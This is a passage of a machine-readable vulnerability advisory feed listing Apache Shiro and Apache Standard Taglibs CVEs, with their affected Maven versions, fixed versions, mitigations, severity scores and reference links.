}, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcf3d8041e1232201fe5d74fc612a193e435784d64002409b448b58fe@%3Cdev.geode.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-287" ], "github_reviewed": true, "github_reviewed_at": "2021-05-06T20:07:20Z", "nvd_published_at": "2020-06-22T19:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-f6jp-j6w3-w9hm", "published": "2021-09-20T20:18:11Z", "modified": "2024-02-19T05:32:19.684337Z", "aliases": [ "CVE-2021-41303" ], "summary": "Apache Shiro vulnerable to a specially crafted HTTP request causing an authentication bypass", "details": "Apache Shiro before 1.8.0, when using Apache Shiro with Spring Boot, a specially crafted HTTP request may cause an authentication bypass. Users should update to Apache Shiro 1.8.0.", "affected": [ { "package": { "name": "org.apache.shiro:shiro-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.8.0" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1", "1.3.2", "1.4.0", "1.4.0-RC2", "1.4.1", "1.4.2", "1.5.0", "1.5.1", "1.5.2", "1.5.3", "1.6.0", "1.7.0", "1.7.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-f6jp-j6w3-w9hm/GHSA-f6jp-j6w3-w9hm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41303" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raae98bb934e4bde304465896ea02d9798e257e486d04a42221e2c41b@%3Cuser.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re470be1ffea44bca28ccb0e67a4cf5d744e2d2b981d00fdbbf5abc13%40%3Cannounce.shiro.apache.org%3E" }, { "type": "WEB", 
"url": "https://security.netapp.com/advisory/ntap-20220609-0001" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" } ], "database_specific": { "cwe_ids": [ "CWE-287" ], "github_reviewed": true, "github_reviewed_at": "2021-09-20T19:17:39Z", "nvd_published_at": "2021-09-17T09:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-jc7h-c423-mpjc", "published": "2024-01-15T12:30:19Z", "modified": "2025-11-04T17:28:02.653382Z", "aliases": [ "CVE-2023-46749" ], "summary": "Apache Shiro vulnerable to path traversal", "details": "Apache Shiro before 1.13.0 or 2.0.0-alpha-4, may be susceptible to a path traversal attack that results in an authentication bypass when used together with path rewriting \n\nMitigation: Update to Apache Shiro 1.13.0+ or 2.0.0-alpha-4+, or ensure `blockSemicolon` is enabled (this is the default).", "affected": [ { "package": { "name": "org.apache.shiro:shiro-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.13.0" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.10.0", "1.10.1", "1.11.0", "1.12.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1", "1.3.2", "1.4.0", "1.4.0-RC2", "1.4.1", "1.4.2", "1.5.0", "1.5.1", "1.5.2", "1.5.3", "1.6.0", "1.7.0", "1.7.1", "1.8.0", "1.9.0", "1.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/01/GHSA-jc7h-c423-mpjc/GHSA-jc7h-c423-mpjc.json" } }, { "package": { "name": "org.apache.shiro:shiro-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0alpha1" }, { "fixed": "2.0.0-alpha4" } ] } ], "versions": [ "2.0.0-alpha-1", "2.0.0-alpha-2", 
"2.0.0-alpha-3" ], "database_specific": { "last_known_affected_version_range": "\u003c 2.0.0alpha4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/01/GHSA-jc7h-c423-mpjc/GHSA-jc7h-c423-mpjc.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46749" }, { "type": "WEB", "url": "https://lists.apache.org/thread/mdv7ftz7k4488rzloxo2fb0p9shnp9wm" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20241108-0002" } ], "database_specific": { "cwe_ids": [ "CWE-22" ], "github_reviewed": true, "github_reviewed_at": "2024-01-16T20:34:50Z", "nvd_published_at": "2024-01-15T10:15:26Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-p836-389h-j692", "published": "2022-05-14T02:46:17Z", "modified": "2025-10-22T19:25:56.524449Z", "aliases": [ "CVE-2016-4437" ], "summary": "Improper Access Control in Apache Shiro", "details": "Apache Shiro before 1.2.5, when a cipher key has not been configured for the \"remember me\" feature, allows remote attackers to execute arbitrary code or bypass intended access restrictions via an unspecified request parameter.", "affected": [ { "package": { "name": "org.apache.shiro:shiro-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.2.5" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.2.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-p836-389h-j692/GHSA-p836-389h-j692.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-4437" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/ef3a800c7d727a00e04b78e2f06c5cd8960f09ca28c9b69d94c3c4c4%40%3Cannouncements.aurora.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ef3a800c7d727a00e04b78e2f06c5cd8960f09ca28c9b69d94c3c4c4@%3Cannouncements.aurora.apache.org%3E" }, { "type": "WEB", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2016-4437" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/137310/Apache-Shiro-1.2.4-Information-Disclosure.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/157497/Apache-Shiro-1.2.4-Remote-Code-Execution.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2016-2035.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2016-2036.html" }, { "type": "WEB", "url": "http://www.securityfocus.com/archive/1/538570/100/0/threaded" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/91024" } ], "database_specific": { "cwe_ids": [ "CWE-284", "CWE-321" ], "github_reviewed": true, "github_reviewed_at": "2022-07-06T19:56:32Z", "nvd_published_at": "2016-06-07T14:06:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-r679-m633-g7wc", "published": "2020-02-04T22:36:36Z", "modified": "2024-12-05T05:38:38.036634Z", "aliases": [ "CVE-2019-12422" ], "summary": "Improper input validation in Apache Shiro", "details": "Apache Shiro before 1.4.2, when using the default \"remember me\" configuration, cookies could be susceptible to a padding attack.", "affected": [ { "package": { "name": "org.apache.shiro:shiro-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.4.2" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", 
"1.3.1", "1.3.2", "1.4.0", "1.4.0-RC2", "1.4.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-r679-m633-g7wc/GHSA-r679-m633-g7wc.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-12422" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/c9db14cfebfb8e74205884ed2bf2e2b30790ce24b7dde9191c82572c@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2d2612c034ab21a3a19d2132d47d3e4aa70105008dd58af62b653040@%3Ccommits.shiro.apache.org%3E" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2020-02-04T21:49:59Z", "nvd_published_at": "2019-11-18T23:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3jx9-mgwx-4q83", "published": "2022-05-14T02:42:51Z", "modified": "2024-12-04T05:51:17.893997Z", "aliases": [ "CVE-2010-3863" ], "summary": "Apache Shiro Path Traversal vulnerability", "details": "Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.", "affected": [ { "package": { "name": "org.apache.shiro:shiro-root", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-root" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.1.0" } ] } ], "versions": [ "1.0.0-incubating" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-3jx9-mgwx-4q83/GHSA-3jx9-mgwx-4q83.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3863" }, { "type": "WEB", "url": 
"https://exchange.xforce.ibmcloud.com/vulnerabilities/62959" }, { "type": "PACKAGE", "url": "https://github.com/apache/shiro" }, { "type": "WEB", "url": "https://web.archive.org/web/20101120091718/http://www.vupen.com/english/advisories/2010/2888" }, { "type": "WEB", "url": "https://web.archive.org/web/20101129043410/http://secunia.com/advisories/41989" }, { "type": "WEB", "url": "https://web.archive.org/web/20110929165859/http://www.securityfocus.com/bid/44616" }, { "type": "WEB", "url": "https://web.archive.org/web/20161017000748/http://www.securityfocus.com/archive/1/514616/100/0/threaded" }, { "type": "WEB", "url": "http://archives.neohapsis.com/archives/fulldisclosure/2010-11/0020.html" } ], "database_specific": { "cwe_ids": [ "CWE-22" ], "github_reviewed": true, "github_reviewed_at": "2024-02-07T22:57:26Z", "nvd_published_at": "2010-11-05T17:00:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-7cxr-h8wm-fg4c", "published": "2023-01-14T12:30:23Z", "modified": "2024-02-16T08:23:48.417435Z", "aliases": [ "CVE-2023-22602" ], "summary": "Apache Shiro Interpretation Conflict vulnerability", "details": "When using Apache Shiro before 1.11.0 together with Spring Boot 2.6+, a specially crafted HTTP request may cause an authentication bypass. The authentication bypass occurs when Shiro and Spring Boot are using different pattern-matching techniques. Both Shiro and Spring Boot \u003c 2.6 default to Ant style pattern matching. 
Mitigation: Update to Apache Shiro 1.11.0, or set the following Spring Boot configuration value: `spring.mvc.pathmatch.matching-strategy = ant_path_matcher` ", "affected": [ { "package": { "name": "org.apache.shiro:shiro-root", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-root" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.11.0" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.10.0", "1.10.1", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1", "1.3.2", "1.4.0", "1.4.0-RC2", "1.4.1", "1.4.2", "1.5.0", "1.5.1", "1.5.2", "1.5.3", "1.6.0", "1.7.0", "1.7.1", "1.8.0", "1.9.0", "1.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-7cxr-h8wm-fg4c/GHSA-7cxr-h8wm-fg4c.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-22602" }, { "type": "PACKAGE", "url": "https://github.com/apache/shiro" }, { "type": "WEB", "url": "https://lists.apache.org/thread/dzj0k2smpzzgj6g666hrbrgsrlf9yhkl" } ], "database_specific": { "cwe_ids": [ "CWE-436" ], "github_reviewed": true, "github_reviewed_at": "2023-01-20T21:50:25Z", "nvd_published_at": "2023-01-14T10:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4q2v-j639-cp7p", "published": "2022-05-14T02:46:12Z", "modified": "2023-11-08T03:58:33.527856Z", "aliases": [ "CVE-2016-6802" ], "summary": "Improper Access Control in Apache Shiro", "details": "Apache Shiro before 1.3.2 allows attackers to bypass intended servlet filters and gain access by leveraging use of a non-root servlet context path.", "affected": [ { "package": { "name": "org.apache.shiro:shiro-all", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-all" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, 
{ "fixed": "1.3.2" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-4q2v-j639-cp7p/GHSA-4q2v-j639-cp7p.json" } }, { "package": { "name": "org.apache.shiro:shiro-web", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-web" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-4q2v-j639-cp7p/GHSA-4q2v-j639-cp7p.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-6802" }, { "type": "WEB", "url": "https://github.com/apache/shiro/commit/b15ab927709ca18ea4a02538be01919a19ab65af" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/SHIRO-584" }, { "type": "WEB", "url": "https://packetstormsecurity.com/files/138709/Apache-Shiro-Filter-Bypass.html" } ], "database_specific": { "cwe_ids": [ "CWE-284" ], "github_reviewed": true, "github_reviewed_at": "2022-11-04T22:45:53Z", "nvd_published_at": "2016-09-20T19:59:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-hhw5-c326-822h", "published": "2023-12-14T09:30:19Z", "modified": "2025-11-04T17:06:07.324210Z", "aliases": [ "CVE-2023-46750" ], "summary": "Open redirect in Apache Shiro", "details": "URL Redirection to Untrusted Site ('Open Redirect') vulnerability when \"form\" authentication is used in Apache Shiro.\nMitigation: Update to Apache Shiro 1.13.0+ or 2.0.0-alpha-4+.", "affected": [ { "package": { "name": 
"org.apache.shiro:shiro-web", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-web" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.13.0" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.10.0", "1.10.1", "1.11.0", "1.12.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1", "1.3.2", "1.4.0", "1.4.0-RC2", "1.4.1", "1.4.2", "1.5.0", "1.5.1", "1.5.2", "1.5.3", "1.6.0", "1.7.0", "1.7.1", "1.8.0", "1.9.0", "1.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/12/GHSA-hhw5-c326-822h/GHSA-hhw5-c326-822h.json" } }, { "package": { "name": "org.apache.shiro:shiro-web", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-web" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0-alpha-1" }, { "fixed": "2.0.0-alpha-4" } ] } ], "versions": [ "2.0.0-alpha-1", "2.0.0-alpha-2", "2.0.0-alpha-3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/12/GHSA-hhw5-c326-822h/GHSA-hhw5-c326-822h.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46750" }, { "type": "WEB", "url": "https://github.com/apache/shiro/commit/3b80f5c8e5a95ba31e92e4825ecc0ba3148b555a" }, { "type": "WEB", "url": "https://github.com/apache/shiro/commit/8400d08d5eac0bc4fae99d28c5adc82dd8a86eda" }, { "type": "PACKAGE", "url": "https://github.com/apache/shiro" }, { "type": "WEB", "url": "https://lists.apache.org/thread/hoc9zdyzmmrfj1zhctsvvtx844tcq6w9" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240808-0002" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20241108-0002" } ], "database_specific": { "cwe_ids": [ "CWE-601" ], "github_reviewed": true, "github_reviewed_at": "2023-12-15T03:11:05Z", "nvd_published_at": "2023-12-14T09:15:42Z", "severity": "MODERATE" 
}, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-pmhc-2g4f-85cg", "published": "2023-07-24T21:30:39Z", "modified": "2025-02-13T19:12:43.466421Z", "aliases": [ "CVE-2023-34478" ], "summary": "Path Traversal in Apache Shiro", "details": "Apache Shiro, before 1.12.0 or 2.0.0-alpha-3, may be susceptible to a path traversal attack that results in an authentication bypass when used together with APIs or other web frameworks that route requests based on non-normalized requests.\n\nMitigation: Update to Apache Shiro 1.12.0+ or 2.0.0-alpha-3+", "affected": [ { "package": { "name": "org.apache.shiro:shiro-web", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-web" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.12.0" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.10.0", "1.10.1", "1.11.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1", "1.3.2", "1.4.0", "1.4.0-RC2", "1.4.1", "1.4.2", "1.5.0", "1.5.1", "1.5.2", "1.5.3", "1.6.0", "1.7.0", "1.7.1", "1.8.0", "1.9.0", "1.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-pmhc-2g4f-85cg/GHSA-pmhc-2g4f-85cg.json" } }, { "package": { "name": "org.apache.shiro:shiro-web", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-web" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0-alpha-1" }, { "fixed": "2.0.0-alpha-3" } ] } ], "versions": [ "2.0.0-alpha-1", "2.0.0-alpha-2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-pmhc-2g4f-85cg/GHSA-pmhc-2g4f-85cg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34478" }, { "type": "WEB", "url": 
"https://github.com/apache/shiro/commit/c3ede3f94efb442acb0795714a022c2c121d1da0" }, { "type": "PACKAGE", "url": "https://github.com/apache/shiro" }, { "type": "WEB", "url": "https://lists.apache.org/thread/mbv26onkgw9o35rldh7vmq11wpv2t2qk" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230915-0005" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/07/24/4" } ], "database_specific": { "cwe_ids": [ "CWE-22" ], "github_reviewed": true, "github_reviewed_at": "2023-07-25T13:51:45Z", "nvd_published_at": "2023-07-24T19:15:10Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-v98j-7crc-wvrj", "published": "2022-02-09T22:03:57Z", "modified": "2023-11-08T04:02:42.580112Z", "aliases": [ "CVE-2020-17523" ], "summary": "Authentication bypass in Apache Shiro", "details": "Apache Shiro before 1.7.1, when using Apache Shiro with Spring, a specially crafted HTTP request may cause an authentication bypass.", "affected": [ { "package": { "name": "org.apache.shiro:shiro-web", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-web" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.7.1" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1", "1.3.2", "1.4.0", "1.4.0-RC2", "1.4.1", "1.4.2", "1.5.0", "1.5.1", "1.5.2", "1.5.3", "1.6.0", "1.7.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-v98j-7crc-wvrj/GHSA-v98j-7crc-wvrj.json" } }, { "package": { "name": "org.apache.shiro:shiro-spring", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-spring" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { 
"introduced": "0" }, { "fixed": "1.7.1" } ] } ], "versions": [ "1.0.0-incubating", "1.1.0", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1", "1.3.2", "1.4.0", "1.4.0-RC2", "1.4.1", "1.4.2", "1.5.0", "1.5.1", "1.5.2", "1.5.3", "1.6.0", "1.7.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-v98j-7crc-wvrj/GHSA-v98j-7crc-wvrj.json" } }, { "package": { "name": "org.apache.shiro:shiro-spring-boot-starter", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.shiro/shiro-spring-boot-starter" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.7.1" } ] } ], "versions": [ "1.4.0", "1.4.0-RC2", "1.4.1", "1.4.2", "1.5.0", "1.5.1", "1.5.2", "1.5.3", "1.6.0", "1.7.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-v98j-7crc-wvrj/GHSA-v98j-7crc-wvrj.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-17523" }, { "type": "WEB", "url": "https://github.com/apache/shiro/pull/263" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/SHIRO-797" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5b93ddf97e2c4cda779d22fab30539bdec454cfa5baec4ad0ffae235@%3Cgitbox.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r679ca97813384bdb1a4c087810ba44d9ad9c7c11583979bb7481d196@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r852971e28f54cafa7d325bd7033115c67d613b112a2a1076817390ac@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r9d93dfb5df016b1a71a808486bc8f9fbafebbdbc8533625f91253f1d@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rce5943430a6136d37a1f2fc201d245fe094e2727a0bc27e3b2d43a39%40%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd4b613e121438b97e3eb263cac3137caddb1dbd8f648b73a4f1898a6@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re25b8317b00a50272a7252c4552cf1a81a97984cc2111ef7728e48e0@%3Cdev.shiro.apache.org%3E" }, { "type": "WEB", "url": "http://shiro.apache.org/download.html" } ], "database_specific": { "cwe_ids": [ "CWE-287" ], "github_reviewed": true, "github_reviewed_at": "2021-04-05T21:20:26Z", "nvd_published_at": "2021-02-03T17:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6x4w-8w53-xrvv", "published": "2020-09-14T18:44:01Z", "modified": "2024-12-02T06:03:30.310261Z", "aliases": [ "CVE-2015-0254" ], "summary": "XXE in Apache Standard Taglibs", "details": "Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a (1) \u003cx:parse\u003e or (2) \u003cx:transform\u003e JSTL XML tag.", "affected": [ { "package": { "name": "org.apache.taglibs:taglibs-standard", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.taglibs/taglibs-standard" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.2.3" } ] } ], "versions": [ "1.2.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-6x4w-8w53-xrvv/GHSA-6x4w-8w53-xrvv.json" } }, { "package": { "name": "org.apache.taglibs:taglibs-standard-impl", "ecosystem": "Maven", "purl": 
"pkg:maven/org.apache.taglibs/taglibs-standard-impl" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.2.3" } ] } ], "versions": [ "1.2.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-6x4w-8w53-xrvv/GHSA-6x4w-8w53-xrvv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-0254" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2016:1376" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8a20e48acb2a40be5130df91cf9d39d8ad93181989413d4abcaa4914@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f8e0814e11c7f21f42224b6de111cb3f5e5ab5c15b78924c516d4ec2@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6c93d8ade3788dbc00f5a37238bc278e7d859f2446b885460783a16f@%3Cpluto-dev.portals.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1686f6196bb9063bf26577a21b8033c19c1a30e5a9159869c8f3d38@%3Cpluto-dev.portals.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re3b72cbb13e1dfe85c4a06959a3b6ca6d939b407ecca80db12b54220@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1179e6971bc46f0f68879a9a10cc97ad4424451b0889aeef04c8077@%3Cpluto-scm.portals.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfc2bfd99c340dafd501676693cd889c1f9f838b97bdd0776a8f5557d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-updates/2015-10/msg00033.html" }, { "type": "WEB", "url": "http://mail-archives.apache.org/mod_mbox/tomcat-taglibs-user/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A%40apache.org%3E" }, { "type": "WEB", "url": 
